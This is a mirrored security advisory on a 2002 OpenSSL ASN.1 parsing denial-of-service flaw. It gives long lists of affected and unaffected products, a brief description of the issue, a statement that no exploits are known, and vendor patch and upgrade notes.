- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
- Microsoft Windows XP Professional
Opera Software Opera Web Browser 6.0.1 linux
OpenSSL Project OpenSSL 0.9.7 beta2
OpenSSL Project OpenSSL 0.9.7 beta1
OpenSSL Project OpenSSL 0.9.6 d
+ Slackware Linux 8.1
OpenSSL Project OpenSSL 0.9.6 c
+ Conectiva Linux 8.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Mandriva Linux Mandrake 8.2
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
OpenSSL Project OpenSSL 0.9.6 b
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ OpenBSD OpenBSD 3.1
+ OpenBSD OpenBSD 3.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2
+ RedHat Linux Advanced Work Station 2.1
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Firewall on CD
+ S.u.S.E. Office Server
+ S.u.S.E. SuSE eMail Server III
+ Sun Linux 5.0.7
+ Sun Linux 5.0.6
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
+ SuSE SUSE Linux Enterprise Server 7
OpenSSL Project OpenSSL 0.9.6 a
+ Conectiva Linux 7.0
+ NetBSD NetBSD 1.5.3
+ NetBSD NetBSD 1.5.2
+ NetBSD NetBSD 1.5.1
+ NetBSD NetBSD 1.5
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
OpenSSL Project OpenSSL 0.9.6
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 6.0
+ EnGarde Secure Linux 1.0.1
+ HP Secure OS software for Linux 1.0
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ NetBSD NetBSD 1.6 beta
+ NetBSD NetBSD 1.6
+ NetBSD NetBSD 1.5.3
+ NetBSD NetBSD 1.5.2
+ NetBSD NetBSD 1.5.1
+ NetBSD NetBSD 1.5
+ OpenBSD OpenBSD 2.9
+ OpenPKG OpenPKG 1.0
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
OpenSSL Project OpenSSL 0.9.5 a
+ Debian Linux 3.0
+ HP Secure OS software for Linux 1.0
+ Immunix Immunix OS 7.0
+ Immunix Immunix OS 6.2
+ MandrakeSoft Corporate Server 1.0.1
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ OpenBSD OpenBSD 2.8
+ OpenBSD OpenBSD 2.7
+ Red Hat Linux 6.2
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.2
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
OpenSSL Project OpenSSL 0.9.5
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
OpenSSL Project OpenSSL 0.9.4
+ Debian Linux 3.0
+ OpenBSD OpenBSD 2.6
OpenSSL Project OpenSSL 0.9.3
OpenSSL Project OpenSSL 0.9.2 b
OpenSSL Project OpenSSL 0.9.1 c
Novell NetMail 3.10 d
Novell NetMail 3.10 c
Novell NetMail 3.10 b
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95 SR2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
- RedHat Linux 7.3
- Sun Solaris 9
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
- Sun Solaris 2.5
Novell NetMail 3.10 a
- Microsoft Windows 3.11
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95 SR2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
- Novell Netware 6.0 SP1
- Novell Netware 6.0
- RedHat Linux 7.3
- Sun Solaris 9
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
- Sun Solaris 2.5
Novell NetMail 3.10
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95 SR2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
- RedHat Linux 7.3
- Sun Solaris 9
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
- Sun Solaris 2.5
NetBSD NetBSD 1.6 beta
Juniper Networks SDX-300 3.1.1
Juniper Networks SDX-300 3.1
Juniper Networks JUNOS 5.6
Juniper Networks JUNOS 5.5
Juniper Networks JUNOS 5.4
Juniper Networks JUNOS 5.3
Juniper Networks JUNOS 5.2
Juniper Networks JUNOS 5.1
Juniper Networks JUNOS 5.0
ISC BIND 9.1.3
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i586
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
ISC BIND 9.1.2
+ Conectiva Linux 7.0
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
ISC BIND 9.1.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
ISC BIND 9.1
+ Caldera OpenUnix 8.0
+ HP Secure OS software for Linux 1.0
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
IBM Linux Affinity Toolkit
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 4.3
- IBM AIX 5.1
HP Webproxy 2.0
+ HP HP-UX 11.0 4
HP Webproxy 1.0
HP VirtualVault 4.6
- HP HP-UX 11.0 4
HP VirtualVault 4.5
- HP HP-UX 11.0 4
HP Tru64 UNIX INTERNET EXPRESS 5.9
HP Tru64 UNIX Compaq Secure Web Server 5.8.1
HP TCP/IP Services for OpenVMS 5.3
HP Secure OS software for Linux 1.0
HP OpenVMS Secure Web Server 1.2
HP OpenVMS Secure Web Server 1.1 -1
HP OpenSSL for OpenVMS Alpha 1.0
HP INTERNET EXPRESS EAK 2.0
Apple Mac OS X Server 10.0
Apple Mac OS X 10.2
Apple Mac OS X 10.1.5
Apple Mac OS X 10.1.4
Apple Mac OS X 10.1.3
Apple Mac OS X 10.1.2
Apple Mac OS X 10.1.1
Apple Mac OS X 10.1
Apple Mac OS X 10.1
Apple Mac OS X 10.0.4
Apple Mac OS X 10.0.3
Apple Mac OS X 10.0.2
Apple Mac OS X 10.0.1
Apple Mac OS X 10.0
Opera Software Opera Web Browser 6.0.3 win32
Opera Software Opera Web Browser 6.0.3 linux
OpenSSL Project OpenSSL 0.9.7 beta3
OpenSSL Project OpenSSL 0.9.6 g
+ Conectiva Linux Enterprise Edition 1.0
+ FreeBSD FreeBSD 4.7 -RELEASE
+ FreeBSD FreeBSD 4.7
+ HP Apache-Based Web Server 2.0.43 .04
+ HP Apache-Based Web Server 2.0.43 .00
+ HP Webmin-Based Admin 1.0 .01
+ Immunix Immunix OS 7+
+ NetBSD NetBSD 1.6
+ OpenPKG OpenPKG 1.1
OpenSSL Project OpenSSL 0.9.6 e
+ FreeBSD FreeBSD 4.6 -RELEASE
+ FreeBSD FreeBSD 4.6
Novell NetMail 3.10 e
ISC BIND 9.2.2
ISC BIND 9.2.1
+ Caldera OpenUnix 8.0
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
+ SCO Unixware 7.1.3
ISC BIND 9.2
+ Conectiva Linux 8.0
+ Conectiva Linux 8.0
+ HP HP-UX 11.11
+ HP HP-UX 11.11
+ HP HP-UX 11.0
+ HP HP-UX 11.0
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.1
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.3
HP Tru64 UNIX Compaq Secure Web Server 5.9.2
HP Tru64 UNIX Compaq Secure Web Server 5.9.1
HP Tru64 UNIX Compaq Secure Web Server 5.8

- 不受影响的程序版本

Opera Software Opera Web Browser 6.0.3 win32
Opera Software Opera Web Browser 6.0.3 linux
OpenSSL Project OpenSSL 0.9.7 beta3
OpenSSL Project OpenSSL 0.9.6 g
+ Conectiva Linux Enterprise Edition 1.0
+ FreeBSD FreeBSD 4.7 -RELEASE
+ FreeBSD FreeBSD 4.7
+ HP Apache-Based Web Server 2.0.43 .04
+ HP Apache-Based Web Server 2.0.43 .00
+ HP Webmin-Based Admin 1.0 .01
+ Immunix Immunix OS 7+
+ NetBSD NetBSD 1.6
+ OpenPKG OpenPKG 1.1
OpenSSL Project OpenSSL 0.9.6 e
+ FreeBSD FreeBSD 4.6 -RELEASE
+ FreeBSD FreeBSD 4.6
Novell NetMail 3.10 e
ISC BIND 9.2.2
ISC BIND 9.2.1
+ Caldera OpenUnix 8.0
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
+ SCO Unixware 7.1.3
ISC BIND 9.2
+ Conectiva Linux 8.0
+ Conectiva Linux 8.0
+ HP HP-UX 11.11
+ HP HP-UX 11.11
+ HP HP-UX 11.0
+ HP HP-UX 11.0
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.1
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.3
HP Tru64 UNIX Compaq Secure Web Server 5.9.2
HP Tru64 UNIX Compaq Secure Web Server 5.9.1
HP Tru64 UNIX Compaq Secure Web Server 5.8.2
HP OpenSSL for OpenVMS Alpha 1.0 -A

- 漏洞讨论

A remotely exploitable denial of service condition has been reported in the OpenSSL ASN.1 library. This vulnerability is due to parsing errors and affects SSL, TLS, S/MIME, PKCS#7 and certificate creation routines. In particular, malformed certificate encodings could cause a denial of service to server and client implementations which depend on OpenSSL.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com &lt;mailto:vuldb@securityfocus.com&gt;.

- 解决方案

Users are strongly encouraged to upgrade existing versions of OpenSSL to version 0.9.6e or 0.9.7beta3.

Secure Computing has advised that customers using SafeWord PremierAccess version 3.1 authentication system. Should download and apply PremierAccess Patch 1 as soon as possible.

Patches supplied by Vincent Danen have been reported to omit the ASN.1 fix. Updated patches have been supplied by Ademar de Souza Reis Jr. <ademar@conectiva.com.br>.

OpenLDAP Project uses OpenSSL. Users are advised to rebuild OpenLDAP with updated versions of OpenSSL to address this issue. Users implementing packaged versions of OpenLDAP are advised to contact the package distributor for update information.

Oracle suggests that this issue can be mitigated against by disabling SSL support.

Oracle Patch 2492925 is scheduled to address vulnerable versions of iAS. A release schedule for various platforms is available.

Oracle CorporateTime Outlook Connector 3.3.1 and Oracle Outlook Connector 3.4 are scheduled for release on August 16, 2002, and will resolve these issues.

Users of HP Secure OS Software for Linux Release 1.0 are advised to install the RPMs issued by Red Hat. HP has also made their own patch available for HP Secure OS Software for Linux.

HP has released a bulletin regarding upgrades and workarounds for additional products affected by this issue. Users of TCP/IP services for OpenVMS V5.3 are advised not to use any keying mechanisms (including tsig and dnssec), which may done by editing the BIND configuration file TCPIP$BIND.CONF. Additional information regarding other products is available in the attached advisory (SSRT2310a). HP has also made fixes available in the form of upgrade packages. The packages, available at http://www.software.hp.com/ISS_products_list.html, are binary versions of Apache 1.3.26.05 and 2.0.39.05 respectively. Additional HP patches are available for Virtualvault and Webproxy (VVOS 11.04), which should be applied after updating Apache.

Conectiva has released a new advisory. Updated openssl packages are available that fix the ASN.1 parsing error. Further details are available in Conectiva Security Announcement CLA-2002:516. Users are urged to download and install the newer packages.

IBM has stated that OpenSSL is not included with AIX but is available via the Linux Affinity ToolKit. Fixed versions of OpenSSL are available for download at:

http://www6.software.ibm.com/dl/aixtbx/aixtbx-p

Apple has included a fix in Security Update 2002-08-20 for MacOS X 10.1.5. This fix contains an upgrade from OpenSSL 0.9.6b to 0.9.6e. Further details are available in the referenced Security Information page. Additionally, Apple has released Security Update 2002-08-23 to address Mac OS X 10.2 (Jaguar).

NetBSD has updated it's advisory. In it's earlier advisory, NetBSD had incorrect upgrading information for NetBSD 1.5. The advisory has been revised to include updated upgrading instructions for users of NetBSD 1.5. NetBSD 1.5 users are strongly urged to apply the new instructions when upgrading systems.

Opera has fixed this vulnerability in their browser with version 6.03.

FreeBSD has released upgrades. Users are advised to upgrade their Ports
collection and reinstall the affected port.

Vendor updates are available:


IBM Linux Affinity Toolkit

OpenSSL Project OpenSSL 0.9.4

OpenSSL Project OpenSSL 0.9.5 a

OpenSSL Project OpenSSL 0.9.6 d

OpenSSL Project OpenSSL 0.9.6 c

OpenSSL Project OpenSSL 0.9.6 a

OpenSSL Project OpenSSL 0.9.6

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站